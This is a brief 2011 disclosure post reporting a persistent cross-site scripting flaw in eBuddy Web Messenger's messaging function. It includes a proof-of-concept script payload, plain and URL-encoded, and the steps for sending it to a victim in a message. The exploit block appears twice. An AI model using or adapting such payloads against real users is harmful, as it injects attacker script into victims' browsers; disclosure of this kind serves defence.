eBuddy Web Messenger - XSS
Am Friday, 2. Sep 2011 im Topic 'Vulnerabilities'
eBuddy Web Messenger suffers from an encoded-Persistent XSS vulnerability in the messaging function. (while sendingA message with embedded code to another authorized user in eBuddy WebMessenger).
Exploit example
Plain XSS (Not going to store, nor execute)
alert('eBuddy Persistent XSS');
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.
[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.
by
Warv0x
Exploit example
Plain XSS (Not going to store, nor execute)
alert('eBuddy Persistent XSS');
Encoded
text=%3Cscript%3Ealert%28'eBuddy%20Persistent%20XSS'%29%3C/script%3E
[*] The attacker sends the encoded embedded code in an IM message.
[*] The victim receives the message with the encoded embedded code and it executes on the victims browser.
by
Warv0x
